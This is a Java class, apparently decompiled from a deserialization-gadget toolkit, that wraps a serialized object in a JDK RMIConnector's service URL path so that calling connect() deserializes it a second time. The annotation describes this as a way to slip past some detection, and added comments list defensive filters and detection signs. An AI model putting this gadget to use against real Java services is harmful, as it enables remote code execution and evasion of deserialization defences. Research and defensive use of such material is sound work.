package com.ar3h.chains.gadget.impl.javanative.jdk;

import com.ar3h.chains.common.ContextTag;
import com.ar3h.chains.common.Gadget;
import com.ar3h.chains.common.GadgetChain;
import com.ar3h.chains.common.GadgetContext;
import com.ar3h.chains.common.Tag;
import com.ar3h.chains.common.annotations.GadgetAnnotation;
import com.ar3h.chains.common.annotations.GadgetTags;
import com.ar3h.chains.common.util.CommonMethod;
import com.ar3h.chains.common.util.Reflections;
import java.util.Map;
import javax.management.remote.JMXServiceURL;
import org.apache.commons.codec.binary.Base64;

/**
 * Gadget that nests one serialized object inside a JDK
 * {@code javax.management.remote.rmi.RMIConnector}, so that the nested data is
 * deserialized a second time when {@code connect()} is later called on the connector.
 *
 * <p>English gloss of the annotation text below: "RMIConnector second-order
 * deserialization; triggered through connect(). The trigger is neither a getter
 * nor toString/equals, so it can get past some checks in specific situations."
 *
 * <p>Reviewer notes (defensive reading):
 * <ul>
 *   <li>The nested bytes travel as a Base64 string inside the
 *       {@code JMXServiceURL.urlPath} field, so a class allow/deny list applied only
 *       to the outer stream never sees the nested classes. A JVM-wide filter
 *       ({@code jdk.serialFilter}) is the control that should also cover the nested
 *       read; confirm on the target JDK.</li>
 *   <li>Untrusted streams have no ordinary reason to carry
 *       {@code javax.management.remote.rmi.RMIConnector}; rejecting it in the
 *       deserialization filter removes this trigger.</li>
 *   <li>Detection: a serialized {@code JMXServiceURL} whose {@code urlPath} starts
 *       with {@code /stub/}. A raw Java serialization stream Base64-encodes to a
 *       value starting with {@code rO0AB}; whether {@code handleSerialized} emits a
 *       raw stream is not visible in this file.</li>
 * </ul>
 */
@GadgetAnnotation(name = "RMIConnector二次反序列化", description = "通过connect()方法触发本链，实现二次反序列化\n这个触发点比较特殊既不是getter类方法，也不是toString、equals等特殊方法，所以适用于在特定场合绕过一些检测", dependencies = {"jdk:javax.management.remote.rmi.RMIConnector"})
@GadgetTags(tags = {Tag.RMIConnectorChain, Tag.SpecialPublicMethod}, nextTags = {Tag.JavaNativeDeserializePayload, Tag.CustomJavaDeserialize})
/* loaded from: input_file:BOOT-INF/lib/chains-core-1.4.1.jar:com/ar3h/chains/gadget/impl/javanative/jdk/RMIConnector.class */
public class RMIConnector implements Gadget {
    // Name of the public method that has to be called on the returned connector;
    // invoke() publishes it in the context under SPECIAL_METHOD_NAME_KEY.
    private final String methodName = "connect";

    /**
     * Builds the connector that carries {@code obj} in serialized, Base64-encoded form.
     *
     * @param obj object handed to {@code CommonMethod.handleSerialized}
     * @return a {@code javax.management.remote.rmi.RMIConnector} built with a null
     *     environment map, whose service URL path is {@code /stub/} plus the Base64 text
     * @throws Exception propagated from serialization, URL construction or the
     *     reflective field write
     */
    public Object getObject(Object obj) throws Exception {
        final String stubPayload = Base64.encodeBase64String(CommonMethod.handleSerialized(obj));

        // The path is written straight into the private field instead of being part
        // of the URL string; presumably this sidesteps JMXServiceURL's own parsing of
        // the path (not confirmed from this file).
        final JMXServiceURL serviceUrl = new JMXServiceURL("service:jmx:rmi://");
        Reflections.setFieldValue(serviceUrl, "urlPath", "/stub/" + stubPayload);

        final Map<String, ?> environment = null;
        return new javax.management.remote.rmi.RMIConnector(serviceUrl, environment);
    }

    /**
     * Creates the next object in the chain, records the trigger method name in the
     * context, and wraps that object with {@link #getObject(Object)}.
     *
     * @param gadgetContext shared context; receives the trigger method name
     * @param gadgetChain chain used to create the object to be wrapped
     * @return the connector produced by {@link #getObject(Object)}
     * @throws Exception propagated from the chain or from {@link #getObject(Object)}
     */
    @Override // com.ar3h.chains.common.Gadget
    public Object invoke(GadgetContext gadgetContext, GadgetChain gadgetChain) throws Exception {
        // Order matters: the downstream object is created before the context is updated.
        final Object inner = gadgetChain.doCreate(gadgetContext);
        gadgetContext.put(ContextTag.SPECIAL_METHOD_NAME_KEY, methodName);
        return getObject(inner);
    }
}
